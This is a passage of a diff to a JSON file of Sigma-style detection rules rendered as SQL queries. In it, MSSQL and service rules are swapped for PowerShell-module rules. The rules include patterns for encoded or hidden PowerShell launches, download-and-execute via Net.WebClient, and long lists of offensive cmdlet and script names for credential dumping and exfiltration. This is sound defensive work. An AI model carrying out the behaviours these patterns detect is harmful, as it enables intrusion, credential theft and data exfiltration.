ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", 
@@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE 
'%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' 
ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial 
artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE 